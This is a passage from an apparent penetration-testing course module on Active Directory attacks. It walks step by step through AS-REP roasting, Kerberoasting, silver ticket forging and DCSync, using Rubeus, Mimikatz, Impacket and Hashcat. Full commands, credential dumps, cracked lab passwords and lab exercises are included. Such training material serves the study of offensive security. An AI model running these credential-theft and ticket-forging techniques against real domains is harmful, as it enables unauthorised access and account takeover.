Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Name MemberOf PasswordLastSet LastLogon UAC
---- -------- -------------------------- -------------------------- --------
dave 2022-09-02 19:21:17.285464 2022-09-07 12:45:15.559299 0x410200
Listing 14 - Using GetNPUsers to perform AS-REP roasting
Listing 14 shows that dave has the user account option Do not require Kerberos preauthentication enabled, meaning it's vulnerable to AS-REP Roasting.
By default, the resulting hash format of impacket-GetNPUsers is compatible with Hashcat. Therefore, let's check the correct mode for the AS-REP hash by grepping for "Kerberos" in the Hashcat help.
kali@kali:~$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
Listing 15 - Obtaining the correct mode for Hashcat
The output of the grep command in listing 15 shows that the correct mode for AS-REP is 18200.
We've now collected everything we need to launch Hashcat and crack the AS-REP hash. Let's enter the mode 18200, the file containing the AS-REP hash, rockyou.txt as wordlist, best64.rule as rule file, and --force to perform the cracking on our Kali VM.
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5asrep$23$dave@CORP.COM:b24a619cfa585dc1894fd6924162b099$1be2e632a9446d1447b5ea80b739075ad214a578f03773a7908f337aa705bcb711f8bce2ca751a876a7564bdbd4a926c10da32b03ec750cf33a2c37abde02f28b7ab363ffa1d18c9dd0262e43ab6a5447db44f71256120f94c24b17b1df465beed362fcb14a539b4e9678029f3b3556413208e8d644fed540d453e1af6f20ab909fd3d9d35ea8b17958b56fd8658b144186042faaa676931b2b75716502775d1a18c11bd4c50df9c2a6b5a7ce2804df3c71c7dbbd7af7adf3092baa56ea865dd6e6fbc8311f940cd78609f1a6b0cd3fd150ba402f14fccd90757300452ce77e45757dc22:Flowers1
...
Listing 16 - Cracking the AS-REP hash with Hashcat
Very nice! Hashcat successfully cracked the AS-REP hash. Listing 16 shows that the user dave has the password Flowers1.
If you receive the Hashcat error "Not enough allocatable device memory for this attack", shut down your Kali VM and add more RAM to it. 4GB is enough for the examples and exercises of this Module.
As mentioned, we can also perform AS-REP Roasting on Windows. We'll use Rubeus,4 which is a toolset for raw Kerberos interactions and abuses. To perform this attack, we'll connect to CLIENT75 via RDP as domain user jeff with the password HenchmanPutridBonbon11. Next, we can start a PowerShell window and navigate to C:\Tools, where Rubeus.exe can be found.
Since we're performing this attack as a pre-authenticated domain user, we don't have to provide any other options to Rubeus except asreproast. Rubeus will automatically identify vulnerable user accounts. We also add the flag /nowrap to prevent new lines being added to the resulting AS-REP hashes.
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> .\Rubeus.exe asreproast /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: AS-REP roasting
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : dave
[*] DistinguishedName : CN=dave,CN=Users,DC=corp,DC=com
[*] Using domain controller: DC1.corp.com (192.168.50.70)
[*] Building AS-REQ (w/o preauth) for: 'corp.com\dave'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$dave@corp.com:AE43CA9011CC7E7B9E7F7E7279DD7F2E$7D4C59410DE2984EDF35053B7954E6DC9A0D16CB5BE8E9DCACCA88C3C13C4031ABD71DA16F476EB972506B4989E9ABA2899C042E66792F33B119FAB1837D94EB654883C6C3F2DB6D4A8D44A8D9531C2661BDA4DD231FA985D7003E91F804ECF5FFC0743333959470341032B146AB1DC9BD6B5E3F1C41BB02436D7181727D0C6444D250E255B7261370BC8D4D418C242ABAE9A83C8908387A12D91B40B39848222F72C61DED5349D984FFC6D2A06A3A5BC19DDFF8A17EF5A22162BAADE9CA8E48DD2E87BB7A7AE0DBFE225D1E4A778408B4933A254C30460E4190C02588FBADED757AA87A
Listing 17 - Using Rubeus to obtain the AS-REP hash of dave
Listing 17 shows that Rubeus identified dave as vulnerable to AS-REP Roasting and displays the AS-REP hash.
Next, let's copy the AS-REP hash and paste it into a text file named hashes.asreproast2 in the home directory of user kali. We can now start Hashcat again to crack the AS-REP hash.
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5asrep$dave@corp.com:ae43ca9011cc7e7b9e7f7e7279dd7f2e$7d4c59410de2984edf35053b7954e6dc9a0d16cb5be8e9dcacca88c3c13c4031abd71da16f476eb972506b4989e9aba2899c042e66792f33b119fab1837d94eb654883c6c3f2db6d4a8d44a8d9531c2661bda4dd231fa985d7003e91f804ecf5ffc0743333959470341032b146ab1dc9bd6b5e3f1c41bb02436d7181727d0c6444d250e255b7261370bc8d4d418c242abae9a83c8908387a12d91b40b39848222f72c61ded5349d984ffc6d2a06a3a5bc19ddff8a17ef5a22162baade9ca8e48dd2e87bb7a7ae0dbfe225d1e4a778408b4933a254c30460e4190c02588fbaded757aa87a:Flowers1
...
Listing 18 - Cracking the modified AS-REP hash
Nice! Hashcat successfully cracked the AS-REP hash.
To identify users with the enabled AD user account option Do not require Kerberos preauthentication, we can use PowerView's Get-DomainUser function with the option -PreauthNotRequired on Windows. On Kali, we can use impacket-GetNPUsers as shown in listing 14 without the -request and -outputfile options.
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option Do not require Kerberos preauthentication enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions5 on another AD user account. Using these permissions, we could reset their passwords, but this would lock out the user from accessing the account. We could also leverage these permissions to modify the User Account Control value of the user to not require Kerberos preauthentication.6 This attack is known as Targeted AS-REP Roasting. Notably, we should reset the User Account Control value of the user once we've obtained the hash.
In this section, we first explored the theory behind AS-REP Roasting. We then performed this attack on Kali with impacket-GetNPUsers and on Windows with Rubeus. In the next section, we'll perform a similar attack, but instead of abusing a missing Kerberos preauthentication, we'll target SPNs.
(Microsoft TechNet, 2014), https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx ↩︎
(Medium Harmj0y, 2017), https://harmj0y.medium.com/roasting-as-reps-e6179a65216b ↩︎
(Github, 2022), https://github.com/GhostPack/Rubeus ↩︎
(Active Directory Security, 2017), https://adsecurity.org/?p=3658 ↩︎
(Stealthbits Blog, 2019), https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/ ↩︎
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Follow the steps outlined in this section to obtain the plaintext password of dave on Windows and Kali by performing AS-REP Roasting. What is the correct Hashcat mode to crack AS-REP hashes?
- Once VM Group 2 is started, the domain corp.com has been slightly modified. Use the techniques from this section to obtain another plaintext password by performing AS-REP Roasting and enter it as answer to this exercise.
22.2.3. Kerberoasting
Let's recall how the Kerberos protocol works. We know that when a user wants to access a resource hosted by a Service Principal Name (SPN), the client requests a service ticket that is generated by the domain controller. The service ticket is then decrypted and validated by the application server, since it is encrypted via the password hash of the SPN.
When requesting the service ticket from the domain controller, no checks are performed to confirm whether the user has any permissions to access the service hosted by the SPN.
These checks are performed as a second step only when connecting to the service itself. This means that if we know the SPN we want to target, we can request a service ticket for it from the domain controller.
The service ticket is encrypted using the SPN's password hash. If we are able to request the ticket and decrypt it using brute force or guessing, we can use this information to crack the cleartext password of the service account. This technique is known as Kerberoasting.1
In this section, we will abuse a service ticket and attempt to crack the password of the service account. Let's begin by connecting to CLIENT75 via RDP as jeff with the password HenchmanPutridBonbon11.
To perform Kerberoasting, we'll use Rubeus again. We specify the kerberoast command to launch this attack technique. In addition, we'll provide hashes.kerberoast as an argument for /outfile to store the resulting TGS-REP hash in. Since we'll execute Rubeus as an authenticated domain user, the tool will identify all SPNs linked with a domain user.
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
Listing 19 - Utilizing Rubeus to perform a Kerberoast attack
Listing 19 shows that Rubeus identified one user account vulnerable to Kerberoasting and wrote the hash to an output file.
Now, let's copy hashes.kerberoast to our Kali machine. We can then review the Hashcat help for the correct mode to crack a TGS-REP hash.
kali@kali:~$ cat hashes.kerberoast
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:80@corp.com*$940AD9DCF5DD5CD8E91A86D4BA0396DB$F57066A4F4F8FF5D70DF39B0C98ED7948A5DB08D689B92446E600B49FD502DEA39A8ED3B0B766E5CD40410464263557BC0E4025BFB92D89BA5C12C26C72232905DEC4D060D3C8988945419AB4A7E7ADEC407D22BF6871D...
...
kali@kali:~$ hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
Listing 20 - Reviewing the correct Hashcat mode
The output of the second command in Listing 20 shows that 13100 is the correct mode to crack TGS-REP hashes.
As in the previous section, we'll start Hashcat with the arguments 13100 as mode, rockyou.txt as wordlist, best64.rule as rule file, and --force as we perform the cracking in a VM.
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:80@corp.com*$940ad9dcf5dd5cd8e91a86d4ba0396db$f57066a4f4f8ff5d70df39b0c98ed7948a5db08d689b92446e600b49fd502dea39a8ed3b0b766e5cd40410464263557bc0e4025bfb92d89ba5c12c26c72232905dec4d060d3c8988945419ab4a7e7adec407d22bf6871d
...
d8a2033fc64622eaef566f4740659d2e520b17bd383a47da74b54048397a4aaf06093b95322ddb81ce63694e0d1a8fa974f4df071c461b65cbb3dbcaec65478798bc909bc94:Strawberry1
...
Listing 21 - Cracking the TGS-REP hash
Great! We successfully retrieved the plaintext password of the user iis_service by performing Kerberoasting.
Next, let's perform Kerberoasting from Linux. We can use impacket-GetUserSPNs2 with the IP of the domain controller as the argument for -dc-ip. Since our Kali machine is not joined to the domain, we also have to provide domain user credentials to obtain the TGS-REP hash. As before, we can use -request to obtain the TGS and output them in a compatible format for Hashcat.
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec...
Listing 22 - Using impacket-GetUserSPNs to perform Kerberoasting on Linux
Listing 22 shows that we successfully obtained the TGS-REP hash.
If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use ntpdate3 or rdate4 to do so.
Now, let's store the TGS-REP hash in a file named hashes.kerberoast2 and crack it with Hashcat as we did before.
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec
...
a96a7e6e29aa173b401935f8f3a476cdbcca8f132e6cc8349dcc88fcd26854e334a2856c009bc76e4e24372c4db4d7f41a8be56e1b6a912c44dd259052299bac30de6a8d64f179caaa2b7ee87d5612cd5a4bb9f050ba565aa97941ccfd634b:Strawberry1
...
Listing 23 - Cracking the TGS-REP hash
Listing 23 shows that we could successfully crack the TGS-REP hash again, providing the same plaintext password as before.
This technique is immensely powerful if the domain contains high-privilege service accounts with weak passwords, which is not uncommon in many organizations. However, if the SPN runs in the context of a computer account, a managed service account,5 or a group-managed service account,6 the password will be randomly generated, complex, and 120 characters long, making cracking infeasible. The same is true for the krbtgt user account which acts as service account for the KDC. Therefore, our chances of performing a successful Kerberoast attack against SPNs running in the context of user accounts is much higher.
Let's assume that we are performing an assessment and notice that we have GenericWrite or GenericAll permissions7 on another AD user account. As stated before, we could reset the user's password but this may raise suspicion. However, we could also set an SPN for the user,8 kerberoast the account, and crack the password hash in an attack named targeted Kerberoasting. We'll note that in an assessment, we should delete the SPN once we've obtained the hash to avoid adding any potential vulnerabilities to the client's infrastructure.
We've now covered how an SPN can be abused to obtain a TGS-REP hash and how to crack it. In the next section, we'll explore an attack utilizing a forged TGS.
(Harmj0y Blog, 2019), https://blog.harmj0y.net/redteaming/kerberoasting-revisited/ ↩︎
(Wikipedia, 2021), https://en.wikipedia.org/wiki/Ntpdate ↩︎
(Wikipedia, 2021), https://en.wikipedia.org/wiki/Rdate ↩︎
(Tech Community Microsoft, 2019), https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/managed-service-accounts-understanding-implementing-best/ba-p/397009 ↩︎
(Microsoft Documentation, 2021), https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview ↩︎
(Active Directory Security, 2017), https://adsecurity.org/?p=3658 ↩︎
(Microsoft Documentation, 2016), https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11) ↩︎
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Follow the steps outlined in this section to obtain the plaintext password of iis_service on Windows and Kali by performing Kerberoasting. What is the correct Hashcat mode to crack TGS-REP hashes?
- Once VM Group 2 is started, the domain corp.com has been slightly modified. Use the techniques from this section to obtain another plaintext password by performing Kerberoasting and enter it as answer to this exercise. To crack the TGS-REP hash, create and utilize a rule file which adds a "1" to the passwords of rockyou.txt. To perform the attack, you can use the user jeff with the password HenchmanPutridBonbon11.
22.2.4. Silver Tickets
In the previous section, we obtained and cracked a TGS-REP hash to retrieve the plaintext password of an SPN. In this section, we'll go one step further and forge our own service tickets.
Remembering the inner workings of the Kerberos authentication, the application on the server executing in the context of the service account checks the user's permissions from the group memberships included in the service ticket. However, the user and group permissions in the service ticket are not verified by the application in a majority of environments. In this case, the application blindly trusts the integrity of the service ticket since it is encrypted with a password hash that is, in theory, only known to the service account and the domain controller.
Privileged Account Certificate (PAC)1 validation2 is an optional verification process between the SPN application and the domain controller. If this is enabled, the user authenticating to the service and its privileges are validated by the domain controller. Fortunately for this attack technique, service applications rarely perform PAC validation.
As an example, if we authenticate against an IIS server that is executing in the context of the service account iis_service, the IIS application will determine which permissions we have on the IIS server depending on the group memberships present in the service ticket.
With the service account password or its associated NTLM hash at hand, we can forge our own service ticket to access the target resource (in our example, the IIS application) with any permissions we desire. This custom-created ticket is known as a silver ticket3 and if the service principal name is used on multiple servers, the silver ticket can be leveraged against them all.
In this section's example, we'll create a silver ticket to get access to an HTTP SPN resource. As we identified in the previous section, the iis_service user account is mapped to an HTTP SPN. Therefore, the password hash of the user account is used to create service tickets for it. For the purposes of this example, let's assume we've identified that the iis_service user has an established session on CLIENT75.
In general, we need to collect the following three pieces of information to create a silver ticket:
- SPN password hash
- Domain SID
- Target SPN
Let's get straight into the attack by connecting to CLIENT75 via RDP as jeff with the password HenchmanPutridBonbon11.
First, let's confirm that our current user has no access to the resource of the HTTP SPN mapped to iis_service. To do so, we'll use iwr4 and enter -UseDefaultCredentials so that the credentials of the current user are used to send the web request.
PS C:\Users\jeff> iwr -UseDefaultCredentials http://web04
iwr :
401 - Unauthorized: Access is denied due to invalid credentials.
Server Error
401 - Unauthorized: Access is denied due to invalid credentials.
You do not have permission to view this directory or page using the credentials that you supplied.
At line:1 char:1
+ iwr -UseBasicParsing -UseDefaultCredentials http://web04
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc
eption
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
Listing 24 - Trying to access the web page on WEB04 as user jeff
Listing 24 shows that we cannot access the web page as jeff. Let's start collecting the information needed to forge a silver ticket.
Since we are a local Administrator on this machine where iis_service has an established session, we can use Mimikatz to retrieve the SPN password hash (NTLM hash of iis_service), which is the first piece of information we need to create a silver ticket.
Let's start PowerShell as Administrator and launch Mimikatz. As we already learned, we can use privilege::debug and sekurlsa::logonpasswords to extract cached AD credentials.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1147751 (00000000:00118367)
Session : Service from 0
User Name : iis_service
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 4:52:14 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1109
msv :
[00000003] Primary
* Username : iis_service
* Domain : CORP
* NTLM : 4d28cf5252d39971419580a51484ca09
* SHA1 : ad321732afe417ebbd24d5c098f986c07872f312
* DPAPI : 1210259a27882fac52cf7c679ecf4443
...
Listing 25 - Using Mimikatz to obtain the NTLM hash of the user account iis_service which is mapped to the target SPN
Listing 25 shows the password hashes of the iis_service user account. The NTLM hash of the service account is the first piece of information we need to create the silver ticket.
Now, let's obtain the domain SID, the second piece of information we need. We can enter whoami /user to get the SID of the current user. Alternatively, we could also retrieve the SID of the SPN user account from the output of Mimikatz, since the domain user accounts exist in the same domain.
As covered in the Windows Privilege Escalation Module, the SID consists of several parts. Since we're only interested in the Domain SID, we'll omit the RID of the user.
PS C:\Users\jeff> whoami /user
USER INFORMATION
----------------
User Name SID
========= =============================================
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105
Listing 26 - Obtaining the domain SID
The highlighted section in listing 26 shows the domain SID.
The last list item is the target SPN. For this example, we'll target the HTTP SPN resource on WEB04 (HTTP/web04.corp.com:80) because we want to access the web page running on IIS.
Now that we have collected all three pieces of information, we can build the command to create a silver ticket with Mimikatz. We can create the forged service ticket with the kerberos::golden module. This module provides the capabilities for creating golden and silver tickets alike. We'll explore the concept of golden tickets in the Module Lateral Movement in Active Directory.
We need to provide the domain SID (/sid:), domain name (/domain:), and the target where the SPN runs (/target:). We also need to include the SPN protocol (/service:), NTLM hash of the SPN (/rc4:), and the /ptt option, which allows us to inject the forged ticket into the memory of the machine we execute the command on.
Finally, we must enter an existing domain user for /user:. This user will be set in the forged ticket. For this example, we'll use jeffadmin. However, we could also use any other domain user since we can set the permissions and groups ourselves.
The complete command can be found in the following listing:
mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
User : jeffadmin
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d28cf5252d39971419580a51484ca09 - rc4_hmac_nt
Service : http
Target : web04.corp.com
Lifetime : 9/14/2022 4:37:32 AM ; 9/11/2032 4:37:32 AM ; 9/11/2032 4:37:32 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jeffadmin @ corp.com' successfully submitted for current session
mimikatz # exit
Bye!
Listing 27 - Forging the service ticket with the user jeffadmin and injecting it into the current session
As shown in Listing 27, a new service ticket for the SPN HTTP/web04.corp.com has been loaded into memory and Mimikatz set appropriate group membership permissions in the forged ticket. From the perspective of the IIS application, the current user will be both the built-in local administrator ( Relative Id: 500 ) and a member of several highly-privileged groups, including the Domain Admins group ( Relative Id: 512 ) as highlighted above.
This means we should have the ticket ready to use in memory. We can confirm this with klist.
PS C:\Tools> klist
Current LogonId is 0:0xa04cc
Cached Tickets: (1)
#0> Client: jeffadmin @ corp.com
Server: http/web04.corp.com @ corp.com
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 9/14/2022 4:37:32 (local)
End Time: 9/11/2032 4:37:32 (local)
Renew Time: 9/11/2032 4:37:32 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
Listing 28 - Listing Kerberos tickets to confirm the silver ticket is submitted to the current session
Listing 28 shows that we have the silver ticket for jeffadmin to access http/web04.corp.com submitted to our current session. This should allow us to access the web page on WEB04 as jeffadmin.
Let's verify our access using the same command as before.
PS C:\Tools> iwr -UseDefaultCredentials http://web04
StatusCode : 200
StatusDescription : OK
Content : <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont...
RawContent : HTTP/1.1 200 OK
Persistent-Auth: true
Accept-Ranges: bytes
Content-Length: 703
Content-Type: text/html
Date: Wed, 14 Sep 2022 11:37:39 GMT
ETag: "b752f823fc8d81:0"
Last-Modified: Wed, 14 Sep 20...
Forms :
Headers : {[Persistent-Auth, true], [Accept-Ranges, bytes], [Content-Length, 703], [Content-Type,
text/html]...}
Images : {}
InputFields : {}
Links : {@{outerHTML=<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img
src="iisstart.png" alt="IIS" width="960" height="600" /></a>; tagName=A;
href=http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409}}
ParsedHtml :
RawContentLength : 703
Listing 29 - Accessing the SMB share with the silver ticket
Great! We successfully forged a service ticket and got access to the web page as jeffadmin. It's worth noting that we performed this attack without access to the plaintext password or password hash of this user.
Once we have access to the password hash of the SPN, a machine account, or user, we can forge the related service tickets for any users and permissions. This is a great way of accessing SPNs in later phases of a penetration test, as we need privileged access in most situations to retrieve the password hash of the SPN.
Since silver and golden tickets represent powerful attack techniques, Microsoft created a security patch to update the PAC structure.5 With this patch in place, the extended PAC structure field PAC_REQUESTOR needs to be validated by a domain controller. This mitigates the capability to forge tickets for non-existent domain users if the client and the KDC are in the same domain. Without this patch, we could create silver tickets for domain users that do not exist. The updates from this patch are enforced from October 11, 2022.
In this section, we learned how to forge service tickets by using the password hash of a target SPN. While we used an SPN run by a user account in the example, we could do the same for SPNs run in the context of a machine account.
(Microsoft Documentation, 2022), https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/166d8064-c863-41e1-9c23-edaaa5f36962 ↩︎
(Microsoft Documentation, 2021), https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/1d1f2b0c-8e8a-4d2a-8665-508d04976f84 ↩︎
(Active Directory Security, 2015), https://adsecurity.org/?p=2011 ↩︎
(Microsoft Documentation, 2022), https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2 ↩︎
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Follow the steps outlined in this section to forge a silver ticket for jeffadmin in order to access the web page located at http://web04. Review the source code of the page and find the flag.
22.2.5. Domain Controller Synchronization
In production environments, domains typically rely on more than one domain controller to provide redundancy. The Directory Replication Service (DRS) Remote Protocol1 uses replication2 to synchronize these redundant domain controllers. A domain controller may request an update for a specific object, like an account, using the IDL_DRSGetNCChanges3 API.
Luckily for us, the domain controller receiving a request for an update does not check whether the request came from a known domain controller. Instead, it only verifies that the associated SID has appropriate privileges. If we attempt to issue a rogue update request to a domain controller from a user with certain rights it will succeed.
To launch such a replication, a user needs to have the Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.
If we obtain access to a user account in one of these groups or with these rights assigned, we can perform a dcsync4 attack in which we impersonate a domain controller. This allows us to request any user credentials from the domain.
To perform this attack, we'll use Mimikatz on a domain-joined Windows machine, and impacket-secretsdump5 on our non-domain joined Kali machine for the examples of this section.
Let's begin with Mimikatz and start by connecting to CLIENT75 as jeffadmin with the password BrouhahaTungPerorateBroom2023!. As jeffadmin is a member of the Domain Admins group, we already have the necessary rights assigned.
Once connected via RDP, let's open a PowerShell window and launch Mimikatz in C:\Tools. For Mimikatz to perform this attack, we can use the lsadump::dcsync module and provide the domain username for which we want to obtain credentials as an argument for /user:. For the purposes of this example, we'll target the domain user dave.
PS C:\Users\jeffadmin> cd C:\Tools\
PS C:\Tools> .\mimikatz.exe
...
mimikatz # lsadump::dcsync /user:corp\dave
[DC] 'corp.com' will be the domain
[DC] 'DC1.corp.com' will be the DC server
[DC] 'corp\dave' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : dave
** SAM ACCOUNT **
SAM Username : dave
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00410200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD DONT_REQUIRE_PREAUTH )
Account expiration :
Password last change : 9/7/2022 9:54:57 AM
Object Security ID : S-1-5-21-1987370270-658905905-1781884369-1103
Object Relative ID : 1103
Credentials:
Hash NTLM: 08d7a47a6f9f66b97b1bae4178747494
ntlm- 0: 08d7a47a6f9f66b97b1bae4178747494
ntlm- 1: a11e808659d5ec5b6c4f43c1e5a0972d
lm - 0: 45bc7d437911303a42e764eaf8fda43e
lm - 1: fdd7d20efbcaf626bd2ccedd49d9512d
...
Listing 30 - Using Mimikatz to perform a dcsync attack to obtain the credentials of dave
Nice! Mimikatz performed the dcsync attack by impersonating a domain controller and obtained the user credentials of dave by using replication.
Now, let's copy the NTLM hash and store it in a file named hashes.dcsync on our Kali system. We can then crack the hash using Hashcat as we learned in the Password Attacks Module. We'll enter 1000 as mode, rockyou.txt as wordlist, and best64.rule as rule file. Additionally, we will enter the file containing the NTLM hash and --force, since we run Hashcat in a VM.
kali@kali:~$ hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
08d7a47a6f9f66b97b1bae4178747494:Flowers1
...
Listing 31 - Using Hashcat to crack the NTLM hash obtained by the dcsync attack
Listing 31 shows that we successfully retrieved the plaintext password of dave.
We can now obtain the NTLM hash of any domain user account of the domain corp.com. Furthermore, we can attempt to crack these hashes and retrieve the plaintext passwords of these accounts.
Notably, we can perform the dcsync attack to obtain any user password hash in the domain, even the domain administrator Administrator.
mimikatz # lsadump::dcsync /user:corp\Administrator
...
Credentials:
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
...
Listing 32 - Using Mimikatz to perform a dcsync attack to obtain the credentials of the domain administrator Administrator
We'll discuss lateral movement vectors such as leveraging NTLM hashes obtained by dcsync in the Module Lateral Movement in Active Directory.
For now, let's perform the dcsync attack from Linux as well. We'll use impacket-secretsdump to achieve this. To launch it, we'll enter the target username dave as an argument for -just-dc-user and provide the credentials of a user with the required rights, as well as the IP of the domain controller in the format domain/user:password@ip.
kali@kali:~$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::
[*] Kerberos keys grabbed
